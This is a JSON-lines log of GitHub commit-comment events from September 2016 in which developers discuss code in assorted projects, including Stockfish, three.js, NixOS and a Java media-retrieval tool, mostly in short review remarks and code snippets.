{"id":"4513748634","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18893118,"position":null,"line":null,"path":null,"commit_id":"3fbadfd28f4ac281b615184707b5f458926bef43","created_at":"2016-09-04T13:27:27Z","updated_at":"2016-09-04T13:27:27Z","body":"Ah, I was too quick ... looked at the boxes ... not the remotes.\r\n\r\n"}},"created_at":"2016-09-04T13:27:27Z"}
{"id":"4513750630","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18893120,"position":null,"line":null,"path":null,"commit_id":"92722fbd1762f96e423409363ba92bd26a68e668","created_at":"2016-09-04T13:28:55Z","updated_at":"2016-09-04T13:28:55Z","body":"btw  fixes #3650 doesn't seem to autoclose so I suggest Fix #3650"}},"created_at":"2016-09-04T13:28:55Z"}
{"id":"4513750761","type":"CommitCommentEvent","actor":{"login":"AnnaShant"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18893121,"position":7,"line":8,"path":"sedona-hotels.html","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-04T13:29:01Z","updated_at":"2016-09-04T13:29:01Z","body":"Привет. Не работает анимация в internet explorer и edge. Что нужно сделать,\r\nчтобы она заработала?\r\n\r\n03 сент. 2016 г. 19:12 пользователь \"Anna lunatic T\" <\r\nanna.lunatic.t@gmail.com> написал:\r\n\r\n> Привет. Не могу сделать чтобы форма закрывалась и открывалась при клике на\r\n> кнопку. Изменения отправила в githab. В коммите ошиблась, анимацию ещё не\r\n> добавляла.\r\n>\r\n> 02 сент. 2016 г. 20:00 пользователь \"Anna lunatic T\" <\r\n> anna.lunatic.t@gmail.com> написал:\r\n>\r\n>> Подправила. Отправила в Github.\r\n>>\r\n>> 2016-09-02 0:43 GMT+05:00 Roman Korobeynikov <notifications@github.com>:\r\n>>\r\n>>> Сначала должны подключаться normalize.css, потом собственные стили.\r\n>>>\r\n>>> —\r\n>>> You are receiving this because you authored the thread.\r\n>>> Reply to this email directly, view it on GitHub\r\n>>> <https://github.com/AnnaShant/217602-sedona/commit/3d0f1c37f21280fe1101ecba84b400315be46887#commitcomment-18869521>,\r\n>>> or mute the thread\r\n>>> <https://github.com/notifications/unsubscribe-auth/ATv2wPOQstLUQzV_UyGP4XeT1nD0ljSeks5qlyrggaJpZM4JzDN4>\r\n>>> .\r\n>>>\r\n>>\r\n>>\r\n"}},"created_at":"2016-09-04T13:29:01Z"}
{"id":"4513752195","type":"CommitCommentEvent","actor":{"login":"binaryoverload"},"repo":{"name":"BapCraft/Neocore-API"},"payload":{"comment":{"id":18893122,"position":null,"line":null,"path":null,"commit_id":"b5272649d7ba20005702ba5b0da2c68945eff7d3","created_at":"2016-09-04T13:30:04Z","updated_at":"2016-09-04T13:30:04Z","body":"I see where you was going now @treyzania  xD"}},"created_at":"2016-09-04T13:30:04Z"}
{"id":"4513753456","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"Roboe/android_kernel_fairphone_fp2"},"payload":{"comment":{"id":18893125,"position":null,"line":null,"path":null,"commit_id":"f2a065870b15fab208a5b5e36272ea29b1d63712","created_at":"2016-09-04T13:30:55Z","updated_at":"2016-09-04T13:30:55Z","body":"Ah. Thanks for the info!"}},"created_at":"2016-09-04T13:30:55Z"}
{"id":"4513754007","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893128,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T13:31:20Z","updated_at":"2016-09-04T13:31:20Z","body":"@Rocky640 Yes I really meant the former but it's just an example... And yes, it might be interesting with a `+`! ;-) I really feel clueless!\r\nAnd please don't mind using my code as I won't submit test soon!"}},"created_at":"2016-09-04T13:31:20Z"}
{"id":"4513756543","type":"CommitCommentEvent","actor":{"login":"rhiever"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18893135,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T13:33:13Z","updated_at":"2016-09-04T13:33:13Z","body":"It might discover a better pipeline if you give it more time. As-is it \"only\" explored 100x100 pipelines. If you set a time limit (`-maxtime` on the command line) for, say, 24h (1440 mins) and let it run, maybe it will find something better."}},"created_at":"2016-09-04T13:33:13Z"}
{"id":"4513757104","type":"CommitCommentEvent","actor":{"login":"frap129"},"repo":{"name":"frap129/angler"},"payload":{"comment":{"id":18893137,"position":null,"line":null,"path":null,"commit_id":"a256b3973638eecbdd357839029272c2b91eeb45","created_at":"2016-09-04T13:33:41Z","updated_at":"2016-09-04T13:33:41Z","body":"@engstk Thanks for pointing that out! That could have been the cause of some problems I'm having"}},"created_at":"2016-09-04T13:33:41Z"}
{"id":"4513757225","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893138,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:33:47Z","updated_at":"2016-09-04T13:33:47Z","body":"Should be one group anyway... I've made no such assumption actually..."}},"created_at":"2016-09-04T13:33:47Z"}
{"id":"4513757697","type":"CommitCommentEvent","actor":{"login":"dimpase"},"repo":{"name":"sagemath/publications"},"payload":{"comment":{"id":18893139,"position":null,"line":null,"path":null,"commit_id":"8455a32d25e1d6f9f53ee2cbf3a412fb53094f9d","created_at":"2016-09-04T13:34:08Z","updated_at":"2016-09-04T13:34:08Z","body":"looks good to me"}},"created_at":"2016-09-04T13:34:08Z"}
{"id":"4513758563","type":"CommitCommentEvent","actor":{"login":"mrhowe2118"},"repo":{"name":"mrhowe2118/MrHowe"},"payload":{"comment":{"id":18893141,"position":null,"line":null,"path":null,"commit_id":"1a5267b58a812ff313d472facf3ca2a9985b9537","created_at":"2016-09-04T13:34:45Z","updated_at":"2016-09-04T13:34:45Z","body":"Ok"}},"created_at":"2016-09-04T13:34:45Z"}
{"id":"4513762567","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893147,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:37:51Z","updated_at":"2016-09-04T13:37:51Z","body":"I don't understand how your code is working if you get the pawns in the order c5, e5, d4, then, sorry: can you elaborate ?"}},"created_at":"2016-09-04T13:37:51Z"}
{"id":"4513764476","type":"CommitCommentEvent","actor":{"login":"om89"},"repo":{"name":"addibble/HoverboardController"},"payload":{"comment":{"id":18893151,"position":null,"line":null,"path":null,"commit_id":"1013f1d3170261a54cf73b8e50823cb9649c86fc","created_at":"2016-09-04T13:39:21Z","updated_at":"2016-09-04T13:39:21Z","body":"Thank addiable for your project. I'm currently another Chinese hoverboard 6.5\" wheel version. It's pinout at J1 as +12v, USART2_Rx, USART_TX, GND. I'm still check the baudrate and the meaning of feedback from gyro-board to main board. Btw, I found a UART terminal software that can customize the baudrate.\r\nhttps://sites.google.com/site/terminalbpp/"}},"created_at":"2016-09-04T13:39:21Z"}
{"id":"4513765927","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893153,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T13:40:33Z","updated_at":"2016-09-04T13:40:33Z","body":"**NEVER EVER USE BUBBLE SORT!**\r\nJust implement a comparator (https://docs.oracle.com/javase/8/docs/api/java/util/Comparator.html) and use Collections.sort() on the list. Also, you want to sort by sequence number, the ids here are strings for a reason and can not usually be converted to integers. The fact that they can in your case is imported from the old ADAM where ids were numbers (longs, actually so even for those parseInt could fail)."}},"created_at":"2016-09-04T13:40:33Z"}
{"id":"4513768758","type":"CommitCommentEvent","actor":{"login":"bystrano"},"repo":{"name":"bystrano/web-mode"},"payload":{"comment":{"id":18893156,"position":null,"line":null,"path":null,"commit_id":"8cb86608136d4dad7200a5e27e73d3b00427cd53","created_at":"2016-09-04T13:42:33Z","updated_at":"2016-09-04T13:42:33Z","body":"#5 "}},"created_at":"2016-09-04T13:42:33Z"}
{"id":"4513769631","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893157,"position":40,"line":40,"path":"src/org/vitrivr/cineast/art/modules/VisualizationMedianColorGrid8Square.java","commit_id":"547b54c1bc174173d3abb9cde6ad32bff9d283f0","created_at":"2016-09-04T13:43:12Z","updated_at":"2016-09-04T13:43:12Z","body":"you can actually simplify this to size[] = {ceil(sqrt(size)), floor(sqrt(size))}"}},"created_at":"2016-09-04T13:43:12Z"}
{"id":"4513770339","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18893158,"position":null,"line":null,"path":null,"commit_id":"e8f73186aa4af57e0c912163ae3b58b9a3220cda","created_at":"2016-09-04T13:43:43Z","updated_at":"2016-09-04T13:43:43Z","body":"You didn't evn do anything (yet)"}},"created_at":"2016-09-04T13:43:43Z"}
{"id":"4513771898","type":"CommitCommentEvent","actor":{"login":"Odoo0101"},"repo":{"name":"Odoo0101/File"},"payload":{"comment":{"id":18893159,"position":null,"line":null,"path":null,"commit_id":"af22c4718e590415cecfa893e1f79dbe550ca57d","created_at":"2016-09-04T13:44:44Z","updated_at":"2016-09-04T13:44:44Z","body":"dfhgdhgfdsfhshdgfdf"}},"created_at":"2016-09-04T13:44:44Z"}
{"id":"4513772348","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18893161,"position":null,"line":null,"path":null,"commit_id":"e8f73186aa4af57e0c912163ae3b58b9a3220cda","created_at":"2016-09-04T13:45:05Z","updated_at":"2016-09-04T13:45:05Z","body":"If my server wouldnt freese because of genisys"}},"created_at":"2016-09-04T13:45:05Z"}
{"id":"4513772563","type":"CommitCommentEvent","actor":{"login":"pogirae"},"repo":{"name":"pogirae/git-tutorial-1"},"payload":{"comment":{"id":18893162,"position":null,"line":null,"path":null,"commit_id":"000880d50ce6c5b27af2b1e1cf08a8645f5da2bf","created_at":"2016-09-04T13:45:12Z","updated_at":"2016-09-04T13:45:12Z","body":"kewl"}},"created_at":"2016-09-04T13:45:12Z"}
{"id":"4513773159","type":"CommitCommentEvent","actor":{"login":"Aluxian"},"repo":{"name":"Aluxian/Whatsie"},"payload":{"comment":{"id":18893167,"position":37,"line":37,"path":"src/scripts/renderer/preload/profile-picture-download.js","commit_id":"6490cdf519ab35ccce95eeec4d2abd06ae7abf38","created_at":"2016-09-04T13:45:33Z","updated_at":"2016-09-04T13:45:33Z","body":"Ah, okay. I only thought that `.jpg` is more common."}},"created_at":"2016-09-04T13:45:33Z"}
{"id":"4513773335","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893168,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:45:39Z","updated_at":"2016-09-04T13:45:39Z","body":"When a pawn has no surrounding pawns that we've already looped through (`computed`), it is a new \"group\"."}},"created_at":"2016-09-04T13:45:39Z"}
{"id":"4513774591","type":"CommitCommentEvent","actor":{"login":"levrik"},"repo":{"name":"Aluxian/Whatsie"},"payload":{"comment":{"id":18893169,"position":37,"line":37,"path":"src/scripts/renderer/preload/profile-picture-download.js","commit_id":"6490cdf519ab35ccce95eeec4d2abd06ae7abf38","created_at":"2016-09-04T13:46:26Z","updated_at":"2016-09-04T13:46:26Z","body":"Yeah. It is more common but I think it is better to use `.jpeg` if WhatsApp Web uses this for the other downloads too."}},"created_at":"2016-09-04T13:46:26Z"}
{"id":"4513775393","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893171,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:47:01Z","updated_at":"2016-09-04T13:47:01Z","body":"So two groups for c5, e5, d4, but one group for c5, d4, e5 ????"}},"created_at":"2016-09-04T13:47:01Z"}
{"id":"4513777627","type":"CommitCommentEvent","actor":{"login":"s3inlc"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893172,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T13:48:24Z","updated_at":"2016-09-04T13:48:24Z","body":"What format can a sequence number have, if it's not numeric only?\r\nSo basically how should they be compared to get the right order when they have the new format? "}},"created_at":"2016-09-04T13:48:24Z"}
{"id":"4513778362","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893173,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:48:56Z","updated_at":"2016-09-04T13:48:56Z","body":"OK that was I was missing, sorry..."}},"created_at":"2016-09-04T13:48:56Z"}
{"id":"4513779626","type":"CommitCommentEvent","actor":{"login":"dasg34"},"repo":{"name":"dasg34/ilovetizen-basic"},"payload":{"comment":{"id":18893174,"position":null,"line":null,"path":null,"commit_id":"49eb654ef91e759c7fa0ce11ac86116408b9d71b","created_at":"2016-09-04T13:49:51Z","updated_at":"2016-09-04T13:49:51Z","body":"1. 불필요한 appdata 구조체를 삭제\r\n2. layout위젯에 edc를 쉽게 연결 시킬 수 있는 함수를 추가\r\n3. naviframe을 추가"}},"created_at":"2016-09-04T13:49:51Z"}
{"id":"4513779725","type":"CommitCommentEvent","actor":{"login":"cherifyass"},"repo":{"name":"cherifyass/android_device_lge_hammerhead"},"payload":{"comment":{"id":18893175,"position":null,"line":null,"path":null,"commit_id":"1cb3c619286e2edaceb068466fc8c5d4159d7f1c","created_at":"2016-09-04T13:49:55Z","updated_at":"2016-09-04T13:49:55Z","body":"True, it's not necessary to have a working build because its generated by build system. \r\nBut we override them to get some google proprietary apps that work only on nexus devices to work on our build."}},"created_at":"2016-09-04T13:49:55Z"}
{"id":"4513780028","type":"CommitCommentEvent","actor":{"login":"hcaixia"},"repo":{"name":"hcaixia/CALayer01"},"payload":{"comment":{"id":18893176,"position":null,"line":null,"path":null,"commit_id":"0b4ca0f74334636ec3a8344ba1d5a125c4c901a7","created_at":"2016-09-04T13:50:09Z","updated_at":"2016-09-04T13:50:09Z","body":"CALayer01-Animation"}},"created_at":"2016-09-04T13:50:09Z"}
{"id":"4513780338","type":"CommitCommentEvent","actor":{"login":"suchja"},"repo":{"name":"nocheinheinrich/Getr-nkevorrat"},"payload":{"comment":{"id":18893177,"position":26,"line":98,"path":"Getränkevorrat/Program.cs","commit_id":"521899a6454de0314ea43a7c0b570e06e28818db","created_at":"2016-09-04T13:50:19Z","updated_at":"2016-09-04T13:50:19Z","body":"@nocheinheinrich Denke daran, dass Methoden mit einem Großbuchstaben beginnen sollten.\r\n\r\nAußerdem wird bei dieser Methode der String in ein Enum konvertiert und nicht andersrum."}},"created_at":"2016-09-04T13:50:19Z"}
{"id":"4513780774","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18893178,"position":null,"line":null,"path":null,"commit_id":"e8f73186aa4af57e0c912163ae3b58b9a3220cda","created_at":"2016-09-04T13:50:36Z","updated_at":"2016-09-04T13:50:36Z","body":"@robske110 Had to find an excuse for changing current version lool"}},"created_at":"2016-09-04T13:50:36Z"}
{"id":"4513784215","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18893181,"position":null,"line":null,"path":null,"commit_id":"e8f73186aa4af57e0c912163ae3b58b9a3220cda","created_at":"2016-09-04T13:53:05Z","updated_at":"2016-09-04T13:53:05Z","body":"lel"}},"created_at":"2016-09-04T13:53:05Z"}
{"id":"4513785912","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893182,"position":13,"line":421,"path":"backend/globaleaks/db/sqlite.sql","commit_id":"b27bc6d27e4a6ca75585cb9e48a27a27d61db4e0","created_at":"2016-09-04T13:54:10Z","updated_at":"2016-09-04T13:54:10Z","body":"@evilaliv3 these constraints look good to me. They specify some of the magic for me better than the python.\r\n\r\nQuick note: Lines 420-421 can drop a paren and just be:\r\n\r\nAND NOT (step_id IS NOT NULL AND fieldgroup_id IS NOT NULL)))"}},"created_at":"2016-09-04T13:54:10Z"}
{"id":"4513786951","type":"CommitCommentEvent","actor":{"login":"pallivishal"},"repo":{"name":"chrissiexyz/valentine"},"payload":{"comment":{"id":18893184,"position":null,"line":null,"path":null,"commit_id":"588d87c12afe7f96a33fb01587fa575c43caa387","created_at":"2016-09-04T13:54:53Z","updated_at":"2016-09-04T13:54:53Z","body":"hey man i am not able run this programe in my google browser.could you help me please."}},"created_at":"2016-09-04T13:54:53Z"}
{"id":"4513787368","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893185,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T13:55:12Z","updated_at":"2016-09-04T13:55:12Z","body":"Sequence numbers are (as the name implies) numbers, in this case Integers. To get to these numbers you need to lookup the segment information as they are not stored with the features, this would be redundant. "}},"created_at":"2016-09-04T13:55:12Z"}
{"id":"4513788545","type":"CommitCommentEvent","actor":{"login":"goldragoon"},"repo":{"name":"UtopiaSoftware/PatientManagementSystem"},"payload":{"comment":{"id":18893186,"position":9,"line":13,"path":"views/searchPatients.pug","commit_id":"fa5408cc3c6648bf5ae816dd4bd0fbe44564d152","created_at":"2016-09-04T13:56:04Z","updated_at":"2016-09-04T13:56:04Z","body":"Reference Usage of jQuery ajax function - by paganinist\r\n`    $.ajax({\r\n      type: 'POST',\r\n      url: 'http://127.0.0.1:8080/patients/insertPatient',\r\n      contentType: 'application/json',\r\n      dataType: 'json',\r\n      data: JSON.stringify(data),\r\n      success: function(data){\r\n          console.log(data);\r\n      },\r\n      error: function(request, status, error){\r\n          console.log(error);\r\n      }\r\n    });`\r\n\r\n위 의 코드처럼 해 주길 바람. url은 신경쓰지 말고 contentType 빼먹으면 nodejs의 body-parser module이 제대로 작동안해 ㅠ"}},"created_at":"2016-09-04T13:56:04Z"}
{"id":"4513789159","type":"CommitCommentEvent","actor":{"login":"winzombie"},"repo":{"name":"winzombie/ezarena"},"payload":{"comment":{"id":18893188,"position":null,"line":null,"path":null,"commit_id":"22ed62cbafa0edcd85da68869235ac2880bd5bc6","created_at":"2016-09-04T13:56:33Z","updated_at":"2016-09-04T13:56:33Z","body":"something wrong whith my browser don,\r\njust add 212 line"}},"created_at":"2016-09-04T13:56:33Z"}
{"id":"4513790394","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18893189,"position":5,"line":62,"path":"src/game/AI/CreatureAISelector.cpp","commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-04T13:57:29Z","updated_at":"2016-09-04T13:57:29Z","body":"I'm awake now. Ehh.. I'm not sure I understand this issue entirely, but those 2 creatures, how were they given creatureEventAI ?\r\n\r\nAlso this is not the commit which would cause this issue at all, it would be the commit before this. this commit only takes care of logging a special type of 'error', and not the error reported by you."}},"created_at":"2016-09-04T13:57:29Z"}
{"id":"4513791535","type":"CommitCommentEvent","actor":{"login":"s3inlc"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893190,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T13:58:20Z","updated_at":"2016-09-04T13:58:20Z","body":"The requests are from the cineast_segment table, so we have these columns:\r\n\tid(string),number(integer),multimediaobject(string),segmentstart(integer),segmentend(integer)\r\nYou are saying that I can sort by 'number' instead of 'id' and I will get the correct order, right?"}},"created_at":"2016-09-04T13:58:20Z"}
{"id":"4513792268","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893191,"position":127,"line":303,"path":"backend/globaleaks/handlers/admin/field.py","commit_id":"b27bc6d27e4a6ca75585cb9e48a27a27d61db4e0","created_at":"2016-09-04T13:58:51Z","updated_at":"2016-09-04T13:58:51Z","body":"ACK."}},"created_at":"2016-09-04T13:58:51Z"}
{"id":"4513792907","type":"CommitCommentEvent","actor":{"login":"atehnix"},"repo":{"name":"LaravelRUS/laravel-skeleton"},"payload":{"comment":{"id":18893192,"position":4,"line":7,"path":"app/Console/Commands/IdeHelperRun.php","commit_id":"a57ad6dbc205971a9f8ad7faafbb590e9c7f2b1d","created_at":"2016-09-04T13:59:16Z","updated_at":"2016-09-04T13:59:16Z","body":"Хм. Справедливый вопрос)\r\nFixed in #8"}},"created_at":"2016-09-04T13:59:16Z"}
{"id":"4513794865","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18893193,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-04T14:00:35Z","updated_at":"2016-09-04T14:00:35Z","body":"Should we makybe make some of the calls to owner conditioned? this could be happening in the time window between a guardian losing it's owner and eventually despawning."}},"created_at":"2016-09-04T14:00:35Z"}
{"id":"4513795254","type":"CommitCommentEvent","actor":{"login":"harshnisar"},"repo":{"name":"harshnisar/badfish"},"payload":{"comment":{"id":18893194,"position":null,"line":null,"path":null,"commit_id":"22071d1954650e8d937c00cd2ab7cec5a32577e4","created_at":"2016-09-04T14:00:51Z","updated_at":"2016-09-04T14:00:51Z","body":"Addresses #13 "}},"created_at":"2016-09-04T14:00:51Z"}
{"id":"4513795401","type":"CommitCommentEvent","actor":{"login":"Paulchen-Panther"},"repo":{"name":"hyperion-project/hyperion.kodi"},"payload":{"comment":{"id":18893195,"position":5,"line":6,"path":"addon.xml","commit_id":"d519b152221b525fa581906cc3646f5b029d38e3","created_at":"2016-09-04T14:00:57Z","updated_at":"2016-09-04T14:00:57Z","body":"Please remove this Line. This was added for testing. not relevant for grabbing\r\n"}},"created_at":"2016-09-04T14:00:57Z"}
{"id":"4513797270","type":"CommitCommentEvent","actor":{"login":"faizauthar12"},"repo":{"name":"Ferrari-Dev-Team/android_device_xiaomi_ferrari"},"payload":{"comment":{"id":18893198,"position":null,"line":null,"path":null,"commit_id":"88b7266d0137b75f9f0f2f7be8622f3ae4f0c016","created_at":"2016-09-04T14:02:13Z","updated_at":"2016-09-04T14:02:13Z","body":"@Nihhaar\nThis branch is for cm-13.0\nNot for exodus\nEvery stuff here is 100% for cm-13.0\n\nSo if you want to make another rom based on this branch\nYou must re- configure by yourself."}},"created_at":"2016-09-04T14:02:13Z"}
{"id":"4513798180","type":"CommitCommentEvent","actor":{"login":"MaSteve"},"repo":{"name":"MaSteve/UVA-problems"},"payload":{"comment":{"id":18893200,"position":null,"line":null,"path":null,"commit_id":"6b97ac7911699e2aaadb81ef613f3f7b70c8961a","created_at":"2016-09-04T14:02:50Z","updated_at":"2016-09-04T14:02:50Z","body":"uHunt, why are you closed?!"}},"created_at":"2016-09-04T14:02:50Z"}
{"id":"4513798476","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893201,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T14:03:03Z","updated_at":"2016-09-04T14:03:03Z","body":"Yes. Also, you should never need to access the cineast_segment entity directly, since this can be done via the ShotLookup (currently in the process of being rewritten, soon to be known as SegmentLookup) which has a method to return all segments from a given multimedia object."}},"created_at":"2016-09-04T14:03:03Z"}
{"id":"4513801013","type":"CommitCommentEvent","actor":{"login":"fabianehlert"},"repo":{"name":"tobsbot/AKGBensheim"},"payload":{"comment":{"id":18893205,"position":null,"line":null,"path":null,"commit_id":"4ddef96366c559187f6bf25a0939d6e3cdbff025","created_at":"2016-09-04T14:04:54Z","updated_at":"2016-09-04T14:04:54Z","body":"Nice commit name 👍😉"}},"created_at":"2016-09-04T14:04:54Z"}
{"id":"4513801559","type":"CommitCommentEvent","actor":{"login":"lemkova"},"repo":{"name":"lemkova/function-olimpiade"},"payload":{"comment":{"id":18893206,"position":null,"line":null,"path":null,"commit_id":"98fdafae94475b5bc9f4380a73ad96fd73797970","created_at":"2016-09-04T14:05:19Z","updated_at":"2016-09-04T14:05:19Z","body":"+Add string folder\r\n+Add README.md of String folder\r\n+Add function isVocal(string)"}},"created_at":"2016-09-04T14:05:19Z"}
{"id":"4513803384","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18893208,"position":null,"line":null,"path":null,"commit_id":"46a045013eca8595c0d728381295eff074dfb1de","created_at":"2016-09-04T14:06:36Z","updated_at":"2016-09-04T14:06:36Z","body":"Not sure if it is of any interest, but I fumble on the same issue, and use the gamepads API to get notified when a controller is plugged / unplugged, remove the need to do the loop every time you update the controller.\r\n\r\nHere is a sample code :\r\n```js\r\n\r\nconst controller1 = new THREE.ViveController(0)\r\nconst controller2 = new THREE.ViveController(1)\r\n\r\nscanForOpenVRGamepads: function() {\r\n\tconst gamepads = navigator.getGamepads()\r\n\tconst toSet =  [\r\n\t\tcontroller2,\r\n\t\tcontroller1\t\t\t\r\n\t]\r\n\tfor (let i = 0; (i < gamepads.length) && (toSet.length > 0); ++i) {\r\n\t\tconst gamepad = gamepads[i]\r\n\t\tif (gamepad && (gamepad.id === \"OpenVR Gamepad\")) {\r\n\t\t\ttoSet.pop().controllerId = i\r\n\t\t}\r\n\t}\r\n},\r\n\r\n// on initialize\r\nwindow.addEventListener(\"gamepadconnected\", scanForOpenVRGamepads, false);\r\nwindow.addEventListener(\"gamepaddisconnected\", scanForOpenVRGamepads, false);\r\nscanForOpenVRGamepads()\t\t\r\n \r\n"}},"created_at":"2016-09-04T14:06:36Z"}
{"id":"4513805103","type":"CommitCommentEvent","actor":{"login":"GrandProMaster"},"repo":{"name":"GrandProMaster/Nothing_simulator"},"payload":{"comment":{"id":18893209,"position":44,"line":46,"path":"Simulator.py","commit_id":"0f220f6fe0932ce99951180e2de92fd5413160e5","created_at":"2016-09-04T14:07:55Z","updated_at":"2016-09-04T14:07:55Z","body":"Wow"}},"created_at":"2016-09-04T14:07:55Z"}
{"id":"4513806329","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893213,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T14:08:50Z","updated_at":"2016-09-04T14:08:50Z","body":"Cc @edolstra, I think keeping `/var/setuid-wrappers` should not have a nested bin dir because a lot assumes that specific path, but we could create a no-nosuid submount in `/run/setuid-wrapper-dirs`"}},"created_at":"2016-09-04T14:08:50Z"}
{"id":"4513807755","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893214,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-04T14:09:56Z","updated_at":"2016-09-04T14:09:56Z","body":"@shlevy Indeed, sounds even better."}},"created_at":"2016-09-04T14:09:56Z"}
{"id":"4513809575","type":"CommitCommentEvent","actor":{"login":"jbaxleyiii"},"repo":{"name":"NewSpring/legacy-javascripts"},"payload":{"comment":{"id":18893215,"position":null,"line":null,"path":null,"commit_id":"7bea4716769392a1a762d5a17f33c10104546b6e","created_at":"2016-09-04T14:11:14Z","updated_at":"2016-09-04T14:11:14Z","body":"@edolyne 🎉 killing it man!"}},"created_at":"2016-09-04T14:11:14Z"}
{"id":"4513810604","type":"CommitCommentEvent","actor":{"login":"sp41mer"},"repo":{"name":"ahmdrz/Instagram-API-python"},"payload":{"comment":{"id":18893216,"position":null,"line":null,"path":null,"commit_id":"166ead4e30471e1cac968c5d5592374b2dcf8f53","created_at":"2016-09-04T14:11:59Z","updated_at":"2016-09-04T14:11:59Z","body":"Hi!\r\nCould you check these methods again? Are they still works?\r\nIt's seems like here is an endless cycle :(\r\nMaybe new version of API or something else are cause of it "}},"created_at":"2016-09-04T14:11:59Z"}
